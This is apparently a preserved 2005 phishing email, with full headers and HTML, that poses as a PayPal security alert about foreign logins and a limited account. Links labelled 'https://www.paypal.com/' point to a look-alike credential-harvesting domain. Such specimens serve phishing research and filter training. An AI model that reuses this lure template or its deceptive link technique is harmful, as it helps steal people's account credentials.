From: PayPal <paypal@email.paypal.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <E1EbpBX-00040o-3H@optimus2.frog.cl>
Date: Mon, 14 Nov 2005 22:00:31 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - optimus2.frog.cl
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - optimus2.frog.cl
X-Source: 
X-Source-Args: 
X-Source-Dir: 
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ***
X-Spam-Status: No, score=3.4 required=5.0 tests=HTML_MESSAGE,MIME_HTML_ONLY,
	RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,REPLY_TO_EMPTY autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  1.6 REPLY_TO_EMPTY Reply-To: is empty
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
	<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=windows-1252">
	<TITLE>paypal</TITLE>
	<META NAME="GENERATOR" CONTENT="Namo WebEditor v5.0(Trial)">
	<META NAME="CREATED" CONTENT="20051021;5242098">
	<META NAME="CHANGED" CONTENT="16010101;0">
</HEAD>
<BODY LANG="es-ES" DIR="LTR">
<A target="_blank" href="https://www.paypal.com/us"><IMG src="http://images.paypal.com/en_US/i/logo/email_logo.gif" alt=PayPal border=0></A>
<TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0>
	<TR>
		<TD WIDTH=100% STYLE="background: url(http://images.PayPal.com/images/bg_clk.gif) repeat scroll">
			<P><IMG SRC="http://images.PayPal.com/images/pixel.gif" NAME="Imagen2" ALIGN=BOTTOM WIDTH=2 HEIGHT=29 BORDER=0></P>
		</TD>
	</TR>
</TABLE>
<P><FONT SIZE=3><B>PayPal Security Measures!</B></FONT></P>
<P><TT><FONT FACE="verdana, arial, helvetica, sans-serif">We are
contacting you to remind you that: on 13 November 2005 our Account
Review Team identified some unusual activity in your account, one or
more attempts to log in to your PayPal account from a foreign IP
address. 
</FONT></TT></P>
<TABLE CELLPADDING=2 CELLSPACING=2>
	<TR BGCOLOR="#ccddee">
		<TD WIDTH=103>
			<P> <FONT SIZE=2><FONT FACE="Verdana, Arial, Helvetica, sans-serif">IP
			Address</FONT></FONT></P>
		</TD>
		<TD WIDTH=205>
			<P> <FONT SIZE=2><FONT FACE="Verdana, Arial, Helvetica, sans-serif">Time</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P> <FONT SIZE=2><FONT FACE="Verdana, Arial, Helvetica, sans-serif">Country</FONT></FONT></P>
		</TD>
	</TR>
	<TR BGCOLOR="#eeeeee">
		<TD WIDTH=103>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>80.53.1.130</FONT></FONT></P>
		</TD>
		<TD WIDTH=240>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>November
			11, 2005 15:05:08 PDT</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Poland</FONT></FONT></P>
		</TD>
	</TR>
	<TR BGCOLOR="#ffffff">
		<TD WIDTH=103>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>80.53.255.174</FONT></FONT></P>
		</TD>
		<TD WIDTH=240>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>November
			11, 2005 15:07:58 PDT</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Poland</FONT></FONT></P>
		</TD>
	</TR>
	<TR BGCOLOR="#eeeeee">
		<TD WIDTH=103>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>141.85.99.169</FONT></FONT></P>
		</TD>
		<TD WIDTH=240>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>November
			12, 2005 15:13:09 PDT</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Romania</FONT></FONT></P>
		</TD>
	</TR>
	<TR BGCOLOR="#ffffff">
		<TD WIDTH=103>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>141.85.99.169</FONT></FONT></P>
		</TD>
		<TD WIDTH=240>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>November
			12, 2005 21:28:08 PDT</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Romania</FONT></FONT></P>
		</TD>
	</TR>
	<TR BGCOLOR="#eeeeee">
		<TD WIDTH=103>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>195.61.146.130</FONT></FONT></P>
		</TD>
		<TD WIDTH=240>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>November
			12, 2005 21:33:43 PDT</FONT></FONT></P>
		</TD>
		<TD WIDTH=67>
			<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Romania</FONT></FONT></P>
		</TD>
	</TR>
</TABLE>
<P>In accordance with PayPal's User Agreement and to ensure that your
account has not been compromised, access to your account was limited.
Your account access will remain limited until this issue has been
resolved. To secure your account and quickly restore full access, we
may require some additional information from you. 
</P>
<P ALIGN=JUSTIFY STYLE="margin-bottom: 0cm"><TT><FONT FACE="Arial">To
securely confirm your PayPal information please go directly to
<A HREF="http://www.updateinformation-paypal.com/login/" TARGET="_blank">https://www.paypal.com/</A>
log in to your PayPal account and perform the steps necessary to
restore your account access as soon as possible or click bellow:</FONT></TT></P>
<P ALIGN=JUSTIFY STYLE="margin-bottom: 0cm"> </P>
<P><TABLE DIR="LTR" ALIGN=LEFT WIDTH=75% BORDER=0 CELLPADDING=2 CELLSPACING=0 BGCOLOR="#ffe65c">
	<COL WIDTH=1*>
	<COL WIDTH=7*>
	<COL WIDTH=248*>
	<COL WIDTH=1*>
	<TR>
		<TD VALIGN=TOP></TD>
		<TD WIDTH=3% BGCOLOR="#fffecd"></TD>
		<TD WIDTH=97% BGCOLOR="#fffecd">
			<P ALIGN=CENTER><TT><FONT FACE="Arial">To continue your
			verification procedure <A HREF="http://www.updateinformation-paypal.com/login/" TARGET="_blank">click
			here</A></FONT></TT></P>
		</TD>
		<TD VALIGN=TOP></TD>
	</TR>
	<TR>
		<TD COLSPAN=4 WIDTH=100%></TD>
	</TR>
</TABLE>  
</P>
<P><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT SIZE=2>Thank
you for using PayPal!<BR>The PayPal Team 
</FONT></FONT></P>
<TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0>
	<TR>
		<TD>
			<P><FONT SIZE=2><FONT FACE="Verdana, Arial, Helvetica, sans-serif"><FONT COLOR="#aaaaaa">Please
			do not reply to this e-mail. Mail sent to this address cannot be
			answered. For assistance, <A HREF="http://www.updateinformation-paypal.com/login/" TARGET="_blank">log
			in</A> to your PayPal account and choose the "Help" link
			in the footer of any page.<BR><BR>To receive email notifications
			in plain text instead of HTML, update your preferences <A HREF="https://www.paypal.com/us/PREFS-NOTI">here</A>.
			</FONT></FONT></FONT>
			</P>
		</TD>
	</TR>
	<TR>
		<TD>
			<P><IMG SRC="http://images.paypal.com/en_US/i/scr/pixel.gif" NAME="Imagen3" ALIGN=BOTTOM WIDTH=2 HEIGHT=10 BORDER=0></P>
		</TD>
	</TR>
</TABLE>
<P> </P>
</BODY>
</HTML>

From support-team@paypal.com  Mon Nov 14 20:28:21 2005
Return-Path: <support-team@paypal.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id C9053536E99
	for <jose@login.monkey.org>; Mon, 14 Nov 2005 20:28:20 -0500 (EST)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 3A7DA6FA377
	for <jose@monkey.org>; Mon, 14 Nov 2005 20:28:18 -0500 (EST)
Received: from S01060040ca429581.du.shawcable.net (S01060040ca429581.du.shawcable.net [70.67.165.78])
	by mail2.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Mon, 14 Nov 2005 20:28:17 -0500 (EST)
Received: from nokia-rw56.rambler.ru (202.223.32.112) by z0-a01.rambler.ru with Microsoft SMTPSVC(5.0.2195.6824);
	 Mon, 14 Nov 2005 20:32:04 -0500
